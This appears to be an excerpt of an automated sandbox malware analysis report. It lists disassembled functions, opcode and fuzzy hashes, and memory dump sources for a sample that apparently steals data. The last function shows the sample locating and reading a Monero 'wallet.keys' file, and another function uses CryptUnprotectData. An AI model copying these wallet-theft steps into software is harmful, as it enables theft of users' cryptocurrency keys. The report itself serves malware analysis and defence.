                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: a0e80b43ee398b77e753b5abb16cc45be4742de2ebedf0308fd24a729948ad49
                          • Instruction ID: 2bf5aa399ead0a1e305cac4fe8e1ebcbc41edf00b7b8a78c1359d5712f3b932b
                          • Opcode Fuzzy Hash: a0e80b43ee398b77e753b5abb16cc45be4742de2ebedf0308fd24a729948ad49
                          • Instruction Fuzzy Hash: 6611BAB4A00209DFDB04DFA4D985AAE77B5FF88300F104569E915AB390D774AE14CFA1
                          Function 0107E8A9 Relevance: 4.1, Strings: 2, Instructions: 1572COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 4\W$C7|
                          • API String ID: 0-3325730710
                          • Opcode ID: 6b11bbe5b79efa16626acfa630ed8b62dfdb719ddfadbdb4a31e396139e8c7ae
                          • Instruction ID: e19c3ce05dfb8244e2851e0c7b4e6b23867a2c663dbe3e669982f37b076fc433
                          • Opcode Fuzzy Hash: 6b11bbe5b79efa16626acfa630ed8b62dfdb719ddfadbdb4a31e396139e8c7ae
                          • Instruction Fuzzy Hash: 57B205F390C2049FD3046F29EC8566AFBE9EF94720F1A893DEAC483744EA3558458797
                          Function 0100381A Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #T?$RB^
                          • API String ID: 0-3580500507
                          • Opcode ID: 5287e3f1276909bb938eeb4751d0fd5e13f29525fd0dc8ff4c648d3647a42251
                          • Instruction ID: e83e9b9d56effe62eaaaf9cf12515236b6c9982970628c3e9fa772e68327c4fe
                          • Opcode Fuzzy Hash: 5287e3f1276909bb938eeb4751d0fd5e13f29525fd0dc8ff4c648d3647a42251
                          • Instruction Fuzzy Hash: D861CEB39083109FE3047F29DC8537AB7E5EF94720F1A492DDAC893384EA7958458B87
                          Function 00F7BC49 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: BW/v
                          • API String ID: 0-3536886779
                          • Opcode ID: d198f04e45285a41de75e1ae085caeedf5316a49cb410cf46ee477ef7826d91d
                          • Instruction ID: 1f6b201e2c35922f28636dd8284e7a56ca70658bcb5f6f17bf3553f131d215f1
                          • Opcode Fuzzy Hash: d198f04e45285a41de75e1ae085caeedf5316a49cb410cf46ee477ef7826d91d
                          • Instruction Fuzzy Hash: C06127F3A082044FE3046E7DEC8977ABBD5DF98320F1A493DEAC487744E97958098686
                          Function 00F8A771 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: >">
                          • API String ID: 0-3836190215
                          • Opcode ID: b554c99200a5274a98a2fb3807e84d9b6d012d60a04153861a3006f58e554810
                          • Instruction ID: 7b3ddcde67dbbe9a9e89e02b408c8e882cfe4582a9ef03ebe27cec3f7c4d8d35
                          • Opcode Fuzzy Hash: b554c99200a5274a98a2fb3807e84d9b6d012d60a04153861a3006f58e554810
                          • Instruction Fuzzy Hash: E35169F3A186145BE70CAE2CEC5677A76D6DBD4311F2A813DEB85C3384E9794C0182D6
                          Function 00FA92B7 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: [e6m
                          • API String ID: 0-3377189604
                          • Opcode ID: 123d4d3599aa26198e37fcb3f94747b5c52fe30a8696c0d29dae8da545453045
                          • Instruction ID: ccc660e62b897021a08fe43ab7cbf1aeb03f1bd8ac352756e6d10c75d1d58b66
                          • Opcode Fuzzy Hash: 123d4d3599aa26198e37fcb3f94747b5c52fe30a8696c0d29dae8da545453045
                          • Instruction Fuzzy Hash: 945107B350C3089FE3586E29DC5963BF7E8EB90310F16892DEBD683384FA7158168653
                          Function 011743C1 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: vmW?
                          • API String ID: 0-1820565121
                          • Opcode ID: 5c9ef784f9e3060e990505f17e4e895d32a5f993ebaf7b2e8e7e6c85014c0534
                          • Instruction ID: 010cac5cbb11b2fb3221c18601a306456b7a884ee4a85c5c6715b56bb006243d
                          • Opcode Fuzzy Hash: 5c9ef784f9e3060e990505f17e4e895d32a5f993ebaf7b2e8e7e6c85014c0534
                          • Instruction Fuzzy Hash: 775197B251DA14DBD30C6E28D84563DB7F5EB98310F17482EDAD247B44EB7058808B97
                          Function 00FB27B9 Relevance: .1, Instructions: 121COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3c2d5d78994ee90e444df99518a0b54a1d908116b625b95cf04cf6ec00ff1ee6
                          • Instruction ID: 0d06083c4b81b7816295df46514e766bfa924b27c9c7bc9146fc206459fd214d
                          • Opcode Fuzzy Hash: 3c2d5d78994ee90e444df99518a0b54a1d908116b625b95cf04cf6ec00ff1ee6
                          • Instruction Fuzzy Hash: AA316EF2A0C6049FE315AE1ADCC57BAF7E6EB98310F0A892DD6C987740E63554148A86
                          Function 00F9E44E Relevance: .1, Instructions: 115COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0b283c805b3730483b40197c8ad6822fe954f88a35a9f6a50de31eef20ca3010
                          • Instruction ID: eb74e4f1194d18ac9f3ee869d42ba333065470baf980725b21caf317ad52fd61
                          • Opcode Fuzzy Hash: 0b283c805b3730483b40197c8ad6822fe954f88a35a9f6a50de31eef20ca3010
                          • Instruction Fuzzy Hash: E931F2B3F082204BF3649A6DDC8072A73D6DBD4720F1A853D9F84EB788D8391D054295
                          Function 0112150F Relevance: .1, Instructions: 94COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 430383d8499a10e7ceff7574e554e0a439d9d3b1e1217dbdfc4a74cbebf95b87
                          • Instruction ID: 4cbd81a009c20483c92d9538e4b58d20bb86c1b363a2d96890d968145174b541
                          • Opcode Fuzzy Hash: 430383d8499a10e7ceff7574e554e0a439d9d3b1e1217dbdfc4a74cbebf95b87
                          • Instruction Fuzzy Hash: E73177B241C304AFD3057E18EC8167AFBE8EF55360F06092DEAC583610E775A850C787
                          Function 00F5D7D7 Relevance: .1, Instructions: 83COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f8cd9731a9c16e791024a0034f7aa8d0ba9df52d11588fb9316729df6825afa2
                          • Instruction ID: a60c008cda323085de91a840aadb082cd97da84f2a50585f89c2702d7219d882
                          • Opcode Fuzzy Hash: f8cd9731a9c16e791024a0034f7aa8d0ba9df52d11588fb9316729df6825afa2
                          • Instruction Fuzzy Hash: 9C21A2B35082048BE7497E39DC2533AB7E5FFA5710F1A493DC6C683780EA396955CB06
                          Function 00CC9750 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 00CC0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CC8E0B
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
                            • Part of subcall function 00CB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CB9A11
                            • Part of subcall function 00CB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
                            • Part of subcall function 00CB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB148F,00000000), ref: 00CB9A5A
                            • Part of subcall function 00CB99C0: LocalFree.KERNEL32(00CB148F), ref: 00CB9A90
                            • Part of subcall function 00CB99C0: CloseHandle.KERNEL32(000000FF), ref: 00CB9A9A
                            • Part of subcall function 00CC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CC8E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00CD0DBA,00CD0DB7,00CD0DB6,00CD0DB3), ref: 00CC0362
